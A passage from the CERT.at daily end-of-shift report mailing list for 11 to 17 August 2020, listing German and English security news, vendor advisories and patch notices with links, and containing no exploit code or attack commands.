known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. These vulnerabilities, if exploited, could result in a number of security issues  --------------------------------------------- https://support.citrix.com/article/CTX276688 ∗∗∗ Security Bulletin: Vulnerabilities in IBM Java SDK affect IBM WebSphere Cast Iron Solution & App Connect Professional ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Installation Manager and IBM Packaging Utility ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: IBM Elastic Storage Server is affected by a vulnerability where an unprivileged user could execute commands as root ( CVE-2020-4273) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-serve… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Installation Manager and IBM Packaging Utility ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: IBM Elastic Storage Server GUI is affected by verbose error messages being displayed. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-serve… ∗∗∗ Security Bulletin: Vulnerabilities in Apache Tomcat affects IBM Platform Symphony ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache… ∗∗∗ Security Bulletin: Incorrect permissions on IBM Spectrum Protect Plus agent files (CVE-2020-4631) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-incorrect-permissions-on-… ∗∗∗ Security Bulletin: A vulnerability in an older version of a Batik plugin that is included in IBM Installation Manager and IBM Packaging Utility ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-an-old… ∗∗∗ Security Bulletin: A vulnerability has been identified in IBM Elastic Storage Server GUI where an unauthorised user can execute commands (CVE-2020-4348) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 17.08.2020
by Daily end-of-shift report 17 Aug '20

17 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 14-08-2020 18:00 − Montag 17-08-2020 18:00 Handler: Dimitri Robl Co-Handler: Robert Waldner ===================== = News = ===================== ∗∗∗ Microsoft fixes actively exploited Windows bug reported 2 years ago ∗∗∗ --------------------------------------------- Microsoft fixed a Windows security vulnerability two years after it was reported. This articles provides greater detail about the bug and how it works.(CVE-2020-1464) --------------------------------------------- https://www.bleepingcomputer.com/news/security/microsoft-fixes-actively-exp… ∗∗∗ Potential Apache Struts 2 RCE flaw fixed, PoCs released ∗∗∗ --------------------------------------------- Have you already updated your Apache Struts 2 to version 2.5.22, released in November 2019? You might want to, and quickly, as information about a potential RCE vulnerability (CVE-2019-0230) and PoC exploits for it have been published. --------------------------------------------- https://www.helpnetsecurity.com/2020/08/17/cve-2019-0230/ ∗∗∗ RevoLTE: Telefonanrufe ließen sich trotz Verschlüsselung abhören ∗∗∗ --------------------------------------------- Sicherheitsforscher zeigen grundlegendes Defizit auf – Mobilfunker haben angeblich bereits nachgebessert --------------------------------------------- https://www.derstandard.at/story/2000119401327/revolte-telefonanrufe-liesse… ∗∗∗ Goodbye EmoCrash - Schwachstelle in Emotet gefixed ∗∗∗ --------------------------------------------- Eine Schwachstelle im Code von Emotet ("EmoCrash" genannt) wurde seit geraumer Zeit in der Security Community als Präventionsmaßnahme gegenEmotet Infektionen verteilt. Die bisher einer breiten Öffentlichkeit nicht bekannte Schwachstelle in der Installationsroutine von Emotet konnte wirksamen Schutz vor einer Infektion bieten, in dem ein Buffer Overflow im Code dieser Routine ausgenutzt wurde um Emotet abstürzen zu lassen. --------------------------------------------- https://cert.at/de/aktuelles/2020/8/godbye-emocrash-schwachstelle-in-emotet… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (squid3), Fedora (lilypond and python3), openSUSE (xen), SUSE (libreoffice, libvirt, webkit2gtk3, xen, and xerces-c), and Ubuntu (apache2). --------------------------------------------- https://lwn.net/Articles/828811/ ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (dovecot, htmlunit, jruby, libetpan, lucene-solr, net-snmp, and posgresql-9.6), Fedora (firefox, nss, qt, and thunderbird), Mageia (glib-networking, mumble, webkit2, and znc), openSUSE (balsa, chromium, firejail, hylafax+, libreoffice, libX11, perl-XML-Twig, thunderbird, wireshark, and xrdp), Red Hat (libvncserver), SUSE (libvirt and perl-PlRPC), and Ubuntu (dovecot and salt). --------------------------------------------- https://lwn.net/Articles/828945/ ∗∗∗ Security Bulletin: Financial Transaction Manager for ACH Services is affected by a potential information disclosure id 177835 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man… ∗∗∗ Security Bulletin: LDAP vulnerability affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ldap-vulnerability-affect… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.08.2020
by Daily end-of-shift report 14 Aug '20

14 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 13-08-2020 18:00 − Freitag 14-08-2020 18:00 Handler: Dimitri Robl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Definition of overkill - using 130 MB executable to hide 24 kB malware, (Fri, Aug 14th) ∗∗∗ --------------------------------------------- One of our readers, Lukas, shared an unusual malicious executable with us earlier this week - one that was 130 MB in size. Making executables extremely large is not an uncommon technique among malware authors[1], as it allows them to easily avoid detection by most AV solutions, since the size of files which AVs will check is usually fairly low (tens of megabytes at most). --------------------------------------------- https://isc.sans.edu/diary/rss/26464 ∗∗∗ XCSSET: Mac-Malware infiziert Xcode-Projekte ∗∗∗ --------------------------------------------- Der Schädling setzt auf 0-day-Exploits, um Nutzerdaten zu klauen. Manipulierte Xcode-Projekte finden über Github Verbreitung, warnt eine Sicherheitsfirma. --------------------------------------------- https://heise.de/-4870987 ∗∗∗ Chrome extensions that lie about their permissions ∗∗∗ --------------------------------------------- Users have learned to review the list of permissions Chrome extensions require before installing them from the webstore. But whats the use if they lie to you? --------------------------------------------- https://blog.malwarebytes.com/puppum/2020/08/chrome-extensions-that-lie-abo… ∗∗∗ Vorsicht vor Handwerks-Notdiensten mit der Telefonnummer 06608643901! ∗∗∗ --------------------------------------------- Bei einem Wasserrohrbruch, einem Gasgebrechen oder bei einem Stromausfall, muss meist schnell eine Expertin oder ein Experte her. Für die Überprüfung eines Installations- oder Elektrik-Notdienstes bleibt da oft keine Zeit mehr. Das nützen unseriöse Unternehmen aus: Sie bieten online einen Notdienst an, kommen auch tatsächlich, aber stellen im Nachhinein viel zu überhöhte Kosten in Rechnung. --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-vor-handwerks-notdiensten-m… ∗∗∗ Mekotio: These aren’t the security updates you’re looking for… ∗∗∗ --------------------------------------------- Another in our occasional series demystifying Latin American banking trojans The post Mekotio: These aren’t the security updates you’re looking for… appeared first on WeLiveSecurity --------------------------------------------- https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-… ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitslücke: Microsofts Multi-Faktor-Authentifizierung umgangen ∗∗∗ --------------------------------------------- Eigentlich sollten Microsofts Onlinedienste mit Fido-Stick und PIN geschützt sein - doch zwei Entwickler konnten die PIN-Abfrage umgehen. --------------------------------------------- https://www.golem.de/news/sicherheitsluecke-microsofts-multi-faktor-authent… ∗∗∗ Critical Vulnerabilities Patched in Quiz and Survey Master Plugin ∗∗∗ --------------------------------------------- On July 17, 2020, our Threat Intelligence team discovered two vulnerabilities in Quiz and Survey Master (QSM), a WordPress plugin installed on over 30,000 sites. These flaws made it possible for unauthenticated attackers to upload arbitrary files and achieve remote code execution, as well as delete arbitrary files like a site’s wp-config.php file [...] --------------------------------------------- https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime may affect Tivoli Netcool Performance Manager for Wireless,Oracle January 2020 CPU ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: jackson-databind (Publicly disclosed vulnerability) found in Network Performance Insight (CVE-2020-8840) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-jackson-databind-publicly… ∗∗∗ Security Bulletin: Netcool Operations Insight – Cloud Native Event Analytics is affected by a International Components for Unicode (ICU) for C/C++ vulnerability (CVE-2020-10531) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-netcool-operations-insigh… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM® Java SDK affect WebSphere Service Registry and Repository and WebSphere Service Registry and Repository Studio July 2020 CPU plus deferred CVE-2019-2590 and CVE-2020-2601 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: A vulnerability exists in the Event Streams 10.0.0 schema registry that allows unauthorised access to create, edit and delete schemas (CVE-2020-4662) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-exists-in… ∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to a remote code execution vulnerability (CVE-2020-4589) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser… ∗∗∗ Apache Struts: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0824 ∗∗∗ PostgreSQL: Mehrere Schwachstellen ermöglichen Privilegieneskalation ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0825 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 13.08.2020
by Daily end-of-shift report 13 Aug '20

13 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 12-08-2020 18:00 − Donnerstag 13-08-2020 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ Avaddon: The Latest RaaS (Ransomware-as-a-Service) to Jump on the Extortion Bandwagon ∗∗∗ --------------------------------------------- As of August 8th, Avaddon ransomware authors launched an extortion site in an effort to further incentivize victims to pay the ransom. Tarik Saleh dissects this ransomware, analyzes victimology, and provides more details on the extortion site. --------------------------------------------- https://www.domaintools.com/resources/blog/avaddon-the-latest-raas-to-jump-… ∗∗∗ MMS Exploit Part 5: Defeating Android ASLR, Getting RCE ∗∗∗ --------------------------------------------- Posted by Mateusz Jurczyk, Project Zero. This post is the fifth and final of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. --------------------------------------------- https://googleprojectzero.blogspot.com/2020/08/mms-exploit-part-5-defeating… ∗∗∗ To the Brim at the Gates of Mordor Pt. 1, (Wed, Aug 12th) ∗∗∗ --------------------------------------------- Search & Analyze Mordor APT29 PCAPs with Brim --------------------------------------------- https://isc.sans.edu/diary/rss/26456 ∗∗∗ Color by numbers: inside a Dharma ransomware-as-a-service attack ∗∗∗ --------------------------------------------- Dharma, a family of ransomware first spotted in 2016, continues to be a threat to many organizations—especially small and medium-sized businesses. Part of the reason for its longevity is that its variants have become the basis for ransomware-as-a-service (RaaS) operations. --------------------------------------------- https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-r… ∗∗∗ Attribution: A Puzzle ∗∗∗ --------------------------------------------- The attribution of cyber attacks is hard. It requires collecting diverse intelligence, analyzing it and deciding who is responsible. Rarely does the evidence available to researchers reach a level of proof that would be acceptable in a court of law. Nevertheless, the private sector rises to the challenge to attempt to associate cyber attacks to threat actors using the intelligence available to them. --------------------------------------------- https://blog.talosintelligence.com/2020/08/attribution-puzzle.html ∗∗∗ Kriminelle versuchen durch seriöse Programme Schadsoftware zu verbreiten! ∗∗∗ --------------------------------------------- Die meisten Menschen vertrauen bekannten Softwareherstellerinnen und -herstellern, wenn diese eine App, ein Programm oder ein anderes Produkt aktualisieren oder ein neues Produkt auf den Markt bringen. Doch genau dieses Vertrauen nutzen Kriminelle bei sogenannten „Supply-Chain-Angriffen“ aus. --------------------------------------------- https://www.watchlist-internet.at/news/kriminelle-versuchen-durch-serioese-… ===================== = Vulnerabilities = ===================== ∗∗∗ Amazon: Sicherheitslücke konnte Alexa-Sprachbefehle verraten ∗∗∗ --------------------------------------------- Mit einem präparierten Link konnte eine Sicherheitslücke in Amazons Infrastruktur ausgenutzt und auf fremde Alexa-Daten zugegriffen werden. --------------------------------------------- https://www.golem.de/news/amazon-sicherheitsluecke-konnte-alexa-sprachbefeh… ∗∗∗ Cybercriminals Are Infiltrating Netgear Routers with Ancient Attack Methods ∗∗∗ --------------------------------------------- It would be heartening to think that cybersecurity has advanced since the 1990s, but some things never change. Vulnerabilities that some of us first saw in 1996 are still with us. --------------------------------------------- https://www.tripwire.com/state-of-security/featured/cybercriminals-infiltra… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (dovecot and roundcube), Fedora (python36), Gentoo (chromium), openSUSE (ark, firefox, go1.13, java-11-openjdk, libX11, wireshark, and xen), Red Hat (bind and kernel), SUSE (libreoffice and python36), and Ubuntu (dovecot and software-properties). --------------------------------------------- https://lwn.net/Articles/828683/ ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (linux-4.19, linux-latest-4.19, and openjdk-8) and Fedora (ark and hylafax+). --------------------------------------------- https://lwn.net/Articles/828744/ ∗∗∗ Security Advisory - Insufficient Authentication Vulnerability in Some Huawei Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200812-… ∗∗∗ Security Advisory - Code Execution Vulnerability in Fastjson Affect Several Huawei Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200812-… ∗∗∗ Security Bulletin: Db2 vulnerabilities affect IBM Spectrum Protect Server (CVE-2020-4230, CVE-2020-4135, CVE-2020-4204, CVE-2020-4200) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-db2-vulnerabilities-affec… ∗∗∗ Security Bulletin: Security vulnerability has been identified in BigFix Platform shipped with IBM License Metric Tool. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-ha… ∗∗∗ Security Bulletin: A vulneraqbility in SQLite affects IBM Cloud Application Performance Managment R esponse Time Monitoring Agent (CVE-2020-9327) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulneraqbility-in-sqlit… ∗∗∗ Security Bulletin: A vulneraqbility in SQLite affects IBM Cloud Application Performance Managment R esponse Time Monitoring Agent (CVE-2020-11655, CVE-2020-11656) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulneraqbility-in-sqlit… ∗∗∗ Security Bulletin: Apache-Log4j (Publicly disclosed vulnerability) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-log4j-publicly-dis… ∗∗∗ Security Bulletin: Vulnerabilities in IBM Java Runtime affect the IBM Spectrum Protect Server (CVE-2020-2593, CVE-2019-4732) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja… ∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to path traversal (CVE-2019-4582) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme… ∗∗∗ Security Bulletin: Vulnerability in IBM WebSphere Application Server Liberty affects IBM Spectrum Protect Operations Center and Client Management Service (CVE-2019-12406) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-webs… ∗∗∗ Security Bulletin: Security vulnerabilities have been identified in IBM DB2 shipped with IBM License Metric Tool v9. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: A vulnerability in Faster-XML jackson databind affects IBM Operations Analytics Predictive Insights (CVE-2019-144892, CVE-2019-144893) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-faster… ∗∗∗ Sophos XG Firewall: Schwachstelle ermöglicht Codeausführung ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0823 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 12.08.2020
by Daily end-of-shift report 12 Aug '20

12 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 11-08-2020 18:00 − Mittwoch 12-08-2020 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ CEO Fraud via WhatsApp und Sprachnachrichten ∗∗∗ --------------------------------------------- CEO Fraud läuft in den meisten bekannten Fällen via E-Mail ab: Kriminelle geben sich gegenüber MitarbeiterInnen mit Überweisungsrecht als CEO/CFO/etc. aus und verlangen, dass unverzüglich und ohne Rücksprache mit anderen eine hohe Summe auf ein Bankkonto (vorzugsweise im Ausland) transferiert werden muss, um einen extrem wichtigen Deal zu fixieren. --------------------------------------------- https://cert.at/de/aktuelles/2020/8/ceo-fraud-via-whatsapp-und-sprachnachri… ∗∗∗ Mobilfunk: LTE-Anrufe ließen sich trotz Verschlüsselung abhören ∗∗∗ --------------------------------------------- Je länger das Opfer in der Leitung bleibt, desto mehr lässt sich von vorherigen Gesprächen rekonstruieren. --------------------------------------------- https://www.golem.de/news/mobilfunk-lte-anrufe-liessen-sich-trotz-verschlue… ∗∗∗ Code Injection Schwachstelle in SAP Application Server ABAP – Solution Tools Plugin ST-PI ∗∗∗ --------------------------------------------- SAP ist einer der größten Anbieter für Unternehmenssoftware weltweit. Schwere Sicherheitslücken in SAP Produkten könnten sich gravierend auf die Sicherheit von Unternehmens-IT-Infrastrukturen auswirken. --------------------------------------------- https://sec-consult.com/blog/2020/08/code-injection-schwachstelle-in-sap-ap… ∗∗∗ FIDO2 for Microsoft Online Accounts / Azure AD ∗∗∗ --------------------------------------------- Nowadays a secure password doesnt necessarily mean your account is safe. --------------------------------------------- https://sec-consult.com/en/blog/2020/08/fido2-for-microsoft-online-accounts… ∗∗∗ Hunting for SQL injections (SQLis) and Cross-Site Request Forgeries (CSRFs) in WordPress Plugins ∗∗∗ --------------------------------------------- This is a detailed overview of the bugs found while reviewing the source code of WordPress plugins. I cover 3 reported vulnerabilities (CVE-2020–5766, CVE-2020–5767 and CVE-2020–5768) which can be exploited for information disclosure and sending forged emails. --------------------------------------------- https://medium.com/tenable-techblog/hunting-for-sql-injections-sqlis-and-cr… ===================== = Vulnerabilities = ===================== ∗∗∗ Patchday: Microsoft schließt aktiv ausgenutzte Windows- und Browser-Lücken ∗∗∗ --------------------------------------------- Zum Patch Tuesday hat Microsoft unter anderem zwei kritische Sicherheitslücken geschlossen, die bereits für Angriffe missbraucht wurden. --------------------------------------------- https://heise.de/-4868224 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (firmware-nonfree, golang-github-seccomp-libseccomp-golang, and ruby-kramdown), Fedora (kernel, libmetalink, and nodejs), openSUSE (go1.13, perl-XML-Twig, and thunderbird), Oracle (kernel, libvncserver, and thunderbird), Red Hat (kernel-rt and python-paunch and openstack-tripleo-heat-templates), SUSE (dpdk, google-compute-engine, libX11, webkit2gtk3, xen, and xorg-x11-libX11), and Ubuntu (nss and samba). --------------------------------------------- https://lwn.net/Articles/828554/ ∗∗∗ QNX-2020-001 Vulnerability in slinger web server Impacts BlackBerry QNX Software Development Platform ∗∗∗ --------------------------------------------- http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber… ∗∗∗ Security Advisory - Improper Authorization Vulnerability in Several Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200812-… ∗∗∗ Security Advisory - Improper Interface Design Vulnerability in Huawei Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200812-… ∗∗∗ Security Advisory - Command Injection Vulnerability in FusionCompute ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200812-… ∗∗∗ Security Bulletin: Java vulnerabilities affect IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-java-vulnerabilities-affe… ∗∗∗ Security Bulletin: A vulnerability in jQuery affects IBM WIoTP MessageGateway (CVE-2020-7656) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-jquery… ∗∗∗ Security Bulletin: IBM i2 Analysts' Notebook and IBM i2 Analysts' Notebook Premium Memory vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-i2-analysts-notebook-… ∗∗∗ Security Bulletin: OpenSLP vulnerability affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-openslp-vulnerability-aff… ∗∗∗ Security Bulletin: Incorrect permissions on IBM Spectrum Protect Plus agent files (CVE-2020-4631) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-incorrect-permissions-on-… ∗∗∗ Security Bulletin: Vulnerabilities in Apache Camel's JMX, Apache Camel RabbitMQ and Apache Camel Netty affects IBM Operations Analytics Predictive Insights (CVE-2020-11971, CVE-2020-11972, CVE-2020-11973) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache… ∗∗∗ Security Bulletin: Multiple Vulnerabilities in jQuery affect IBM WIoTP MessageGateway ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Network Security (NSS) vulnerability affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-network-security-nss-vuln… ∗∗∗ Security Bulletin: Vulnerabilities in Netty affect IBM Netcool Agile Service Manager (CVE-2020-7238) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-netty-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in jQuery affect IBM WIoTP MessageGateway (CVE-2020-11023, CVE-2020-11022) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ IPAS: Security Advisories for August 2020 ∗∗∗ --------------------------------------------- https://blogs.intel.com/technology/2020/08/ipas-security-advisories-for-aug… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.08.2020
by Daily end-of-shift report 11 Aug '20

11 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Montag 10-08-2020 18:00 − Dienstag 11-08-2020 18:00 Handler: Dimitri Robl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Upgraded Agent Tesla malware steals passwords from browsers, VPNs ∗∗∗ --------------------------------------------- New variants of Agent Tesla remote access Trojan now come with modules dedicated to stealing credentials from applications including popular web browsers, VPN software, as well as FTP and email clients. --------------------------------------------- https://www.bleepingcomputer.com/news/security/upgraded-agent-tesla-malware… ∗∗∗ SBA phishing scams: from malware to advanced social engineering ∗∗∗ --------------------------------------------- SBA loan scams continue to make the rounds targeting small business owners, CEOS, and CFOs. --------------------------------------------- https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware… ∗∗∗ Script-Based Malware: A New Attacker Trend on Internet Explorer ∗∗∗ --------------------------------------------- Script-based malware can be appealing for attackers who want the ability to quickly and easily develop new variants to evade detection. --------------------------------------------- https://unit42.paloaltonetworks.com/script-based-malware/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security Bulletins Posted ∗∗∗ --------------------------------------------- Adobe has published security bulletins for Adobe Acrobat and Reader (APSB20-48) and Adobe Lightroom (APSB20-51). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the bulletin. This posting is provided “AS IS” with no warranties and confers no rights. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1908 ∗∗∗ vBulletin fixes ridiculously easy to exploit zero-day RCE bug ∗∗∗ --------------------------------------------- A simple one-line exploit has been published for a zero-day pre-authentication remote code execution (RCE) vulnerability in the vBulletin forum software. --------------------------------------------- https://www.bleepingcomputer.com/news/security/vbulletin-fixes-ridiculously… ∗∗∗ Kritische Updates für Citrix Endpoint Management ∗∗∗ --------------------------------------------- Insgesamt 5 Lücken schließt Citrix; wer eine eigene Installation betreibt, sollte schnell patchen. --------------------------------------------- https://heise.de/-4867952 ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (pillow, ruby-kramdown, wpa, and xrdp), Fedora (ark and rpki-client), Gentoo (apache, ark, global, gthumb, and iproute2), openSUSE (chromium, grub2, java-11-openjdk, libX11, and opera), Red Hat (bind, chromium-browser, java-1.7.1-ibm, java-1.8.0-ibm, and libvncserver), SUSE (LibVNCServer, perl-XML-Twig, thunderbird, and xen), and Ubuntu (samba). --------------------------------------------- https://lwn.net/Articles/828476/ ∗∗∗ iCloud for Windows 11.3 ∗∗∗ --------------------------------------------- https://support.apple.com/kb/HT211294 ∗∗∗ iCloud for Windows 7.20 ∗∗∗ --------------------------------------------- https://support.apple.com/kb/HT211295 ∗∗∗ SSA-809841: Buffer Overflow Vulnerability in Third-Party Component pppd ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-809841.txt ∗∗∗ SSA-786743: Code Injection Vulnerability in Advanced Reporting for Desigo CC and ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-786743.txt ∗∗∗ SSA-712518: Information Disclosure Vulnerability (Kr00k) in Industrial Wi-Fi ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-712518.txt ∗∗∗ SSA-388646: Local Privilege Escalation in Automation License Manager ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-388646.txt ∗∗∗ SSA-370042: Cross-Site-Scripting (XSS) in SICAM A8000 RTUs ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-370042.txt ∗∗∗ Security Bulletin: IBM Event Streams is affected by multiple Java vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe… ∗∗∗ Security Bulletin: IBM Event Streams affected by multiple vulnerabilities in OpenSSL package ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-affecte… ∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Bind affect IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: IBM Event Streams is affected by multiple Node.js vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe… ∗∗∗ Security Bulletin: JQuery as used by IBM QRadar Network Packet Capture is vulnerable to Cross Site Scripting (XSS) (CVE-2020-11023, CVE-2020-11022) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-jquery-as-used-by-ibm-qra… ∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: IBM Event Streams is affected by a vulnerability in Apache Commons Compress (CVE-2019-12402) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe… ∗∗∗ Security Bulletin: IBM Event Streams is affected by a Java vulnerability (CVE-2020-2654) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe… ∗∗∗ Security Bulletin: Information disclosure in WebSphere Liberty (CVE-2020-4329) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-in… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Libreswan affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ SAP Patchday August 